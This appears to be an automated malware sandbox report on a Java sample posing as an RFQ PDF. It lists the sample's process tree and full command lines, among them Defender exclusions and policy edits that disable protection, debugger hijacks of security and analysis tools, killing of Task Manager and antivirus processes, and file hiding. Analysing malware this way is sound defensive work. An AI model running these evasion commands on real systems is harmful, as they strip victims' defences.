PID 2724 wrote to memory of 4544	2724	cmd.exe	319
PID 2724 wrote to memory of 4544	2724	cmd.exe	319
PID 2724 wrote to memory of 4452	2724	cmd.exe	320
PID 2724 wrote to memory of 4452	2724	cmd.exe	320
PID 3876 wrote to memory of 4560	3876	java.exe	321
PID 3876 wrote to memory of 4560	3876	java.exe	321
PID 4560 wrote to memory of 3904	4560	cmd.exe	323
PID 4560 wrote to memory of 3904	4560	cmd.exe	323
PID 4560 wrote to memory of 4788	4560	cmd.exe	324
PID 4560 wrote to memory of 4788	4560	cmd.exe	324
PID 3876 wrote to memory of 1788	3876	java.exe	325
PID 3876 wrote to memory of 1788	3876	java.exe	325
PID 1788 wrote to memory of 4628	1788	cmd.exe	327
PID 1788 wrote to memory of 4628	1788	cmd.exe	327
PID 1788 wrote to memory of 4992	1788	cmd.exe	328
PID 1788 wrote to memory of 4992	1788	cmd.exe	328
PID 3876 wrote to memory of 4700	3876	java.exe	329
PID 3876 wrote to memory of 4700	3876	java.exe	329
PID 4700 wrote to memory of 2376	4700	cmd.exe	331
PID 4700 wrote to memory of 2376	4700	cmd.exe	331
PID 4700 wrote to memory of 4128	4700	cmd.exe	332
PID 4700 wrote to memory of 4128	4700	cmd.exe	332
PID 3876 wrote to memory of 3124	3876	java.exe	333
PID 3876 wrote to memory of 3124	3876	java.exe	333
PID 3124 wrote to memory of 4704	3124	cmd.exe	335
PID 3124 wrote to memory of 4704	3124	cmd.exe	335
PID 3124 wrote to memory of 3892	3124	cmd.exe	336
PID 3124 wrote to memory of 3892	3124	cmd.exe	336
PID 3876 wrote to memory of 2884	3876	java.exe	337
PID 3876 wrote to memory of 2884	3876	java.exe	337
PID 2884 wrote to memory of 4148	2884	cmd.exe	339
PID 2884 wrote to memory of 4148	2884	cmd.exe	339
PID 2884 wrote to memory of 4736	2884	cmd.exe	340
PID 2884 wrote to memory of 4736	2884	cmd.exe	340
PID 3876 wrote to memory of 1568	3876	java.exe	341
PID 3876 wrote to memory of 1568	3876	java.exe	341
PID 1568 wrote to memory of 2808	1568	cmd.exe	343
PID 1568 wrote to memory of 2808	1568	cmd.exe	343
PID 1568 wrote to memory of 4324	1568	cmd.exe	344
PID 1568 wrote to memory of 4324	1568	cmd.exe	344
PID 3876 wrote to memory of 1620	3876	java.exe	345
PID 3876 wrote to memory of 1620	3876	java.exe	345
PID 1620 wrote to memory of 4500	1620	cmd.exe	347
PID 1620 wrote to memory of 4500	1620	cmd.exe	347
PID 1620 wrote to memory of 4816	1620	cmd.exe	348
PID 1620 wrote to memory of 4816	1620	cmd.exe	348
PID 3876 wrote to memory of 1156	3876	java.exe	349
PID 3876 wrote to memory of 1156	3876	java.exe	349
PID 1156 wrote to memory of 4948	1156	cmd.exe	351
PID 1156 wrote to memory of 4948	1156	cmd.exe	351
PID 1156 wrote to memory of 4628	1156	cmd.exe	352
PID 1156 wrote to memory of 4628	1156	cmd.exe	352
PID 3876 wrote to memory of 4664	3876	java.exe	353
PID 3876 wrote to memory of 4664	3876	java.exe	353
PID 4664 wrote to memory of 1252	4664	cmd.exe	355
PID 4664 wrote to memory of 1252	4664	cmd.exe	355
PID 4664 wrote to memory of 1880	4664	cmd.exe	356
PID 4664 wrote to memory of 1880	4664	cmd.exe	356
PID 3876 wrote to memory of 4704	3876	java.exe	357
PID 3876 wrote to memory of 4704	3876	java.exe	357
PID 4704 wrote to memory of 4168	4704	cmd.exe	359
PID 4704 wrote to memory of 4168	4704	cmd.exe	359
PID 4704 wrote to memory of 3956	4704	cmd.exe	360
PID 4704 wrote to memory of 3956	4704	cmd.exe	360
PID 3876 wrote to memory of 3528	3876	java.exe	361
PID 3876 wrote to memory of 3528	3876	java.exe	361
PID 3528 wrote to memory of 4332	3528	cmd.exe	363
PID 3528 wrote to memory of 4332	3528	cmd.exe	363
PID 3876 wrote to memory of 4544	3876	java.exe	364
PID 3876 wrote to memory of 4544	3876	java.exe	364
PID 3528 wrote to memory of 3856	3528	cmd.exe	366
PID 3528 wrote to memory of 3856	3528	cmd.exe	366
PID 3876 wrote to memory of 4612	3876	java.exe	367
PID 3876 wrote to memory of 4612	3876	java.exe	367
PID 4612 wrote to memory of 1240	4612	cmd.exe	369
PID 4612 wrote to memory of 1240	4612	cmd.exe	369
PID 4612 wrote to memory of 3892	4612	cmd.exe	370
PID 4612 wrote to memory of 3892	4612	cmd.exe	370
PID 3876 wrote to memory of 2412	3876	java.exe	371
PID 3876 wrote to memory of 2412	3876	java.exe	371
PID 2412 wrote to memory of 4324	2412	cmd.exe	373
PID 2412 wrote to memory of 4324	2412	cmd.exe	373
PID 2412 wrote to memory of 4332	2412	cmd.exe	374
PID 2412 wrote to memory of 4332	2412	cmd.exe	374
PID 3876 wrote to memory of 3856	3876	java.exe	375
PID 3876 wrote to memory of 3856	3876	java.exe	375
PID 3876 wrote to memory of 792	3876	java.exe	379
PID 3876 wrote to memory of 792	3876	java.exe	379
PID 3876 wrote to memory of 5008	3876	java.exe	381
PID 3876 wrote to memory of 5008	3876	java.exe	381
PID 3876 wrote to memory of 1300	3876	java.exe	383
PID 3876 wrote to memory of 1300	3876	java.exe	383
PID 3876 wrote to memory of 3896	3876	java.exe	385
PID 3876 wrote to memory of 3896	3876	java.exe	385
PID 3876 wrote to memory of 3856	3876	java.exe	387
PID 3876 wrote to memory of 3856	3876	java.exe	387
PID 3876 wrote to memory of 1192	3876	java.exe	389
PID 3876 wrote to memory of 1192	3876	java.exe	389
PID 3876 wrote to memory of 4332	3876	java.exe	392
PID 3876 wrote to memory of 4332	3876	java.exe	392

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
492	attrib.exe
1072	attrib.exe
1192	attrib.exe
1380	attrib.exe
1568	attrib.exe
1884	attrib.exe
1476	attrib.exe
3384	attrib.exe

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar "C:\Users\Admin\AppData\Local\Temp\Atlas Home Products Inc RFQ_pdf.jar"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3876
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2564
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2844
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4016
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3528
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3932
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:1476
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:3384
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\ujTBR\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:492
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\ujTBR\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:1072
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\ujTBR
  2⤵
  - Views/modifies file attributes
  PID:1192
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\ujTBR
  2⤵
  - Views/modifies file attributes
  PID:1380
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\ujTBR
  2⤵
  - Views/modifies file attributes
  PID:1568
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +s +r C:\Users\Admin\ujTBR\NXtxm.class
  2⤵
  - Views/modifies file attributes
  PID:1884
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:740
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:4064
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:4356
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\ujTBR','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\ujTBR\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3988
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3408
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
  2⤵
  PID:3520
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3964
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
  2⤵
  PID:1572
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2196
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
  2⤵
  PID:1300
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1888
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2136
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
  2⤵
  PID:2720
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3872
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:1580
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4232
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:4248
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4384
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
  2⤵
  PID:4396
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4484
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
  2⤵
  PID:4480
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4520
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
  2⤵
  PID:4588
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4676
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:4728
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4784
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:4868
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4892
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:4936
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:5008
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:5056
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:512
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:64
    3⤵
    PID:3972
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:32
    3⤵
    PID:4424
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2220
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1956
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:696
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4216
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4304
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4148
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2140
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1192
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4540
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4464
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:4652
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:4516
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4716
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    PID:4856
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:4600
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4476
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:4616
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:4356
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4944
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5108
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:1064
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:5064
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3964
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:5116
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:2364
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4932
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:2588
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:5032
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4896
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
    3⤵
    PID:5084
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4868
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:4128
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:4956
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4972
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:4000
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:1320
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1328
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:5056
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:4112
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3564
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:4336
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:4288
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4344
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1624
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:1380
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:4188
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4200
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:2612
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:3796
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3768
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    PID:3572
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:3748
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4116
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    PID:4668
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:4368
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4232
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4720
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:4812
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:4648
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4580
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:64
    3⤵
    PID:4428
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:32
    3⤵
    PID:4700
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4944
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:4724
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:1464
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4728
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    PID:5004
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:1944
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:864
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3100
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:5008
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:3892
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1836
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    PID:2600
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:4272
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2844
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    PID:4416
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:4184
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1380
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:64
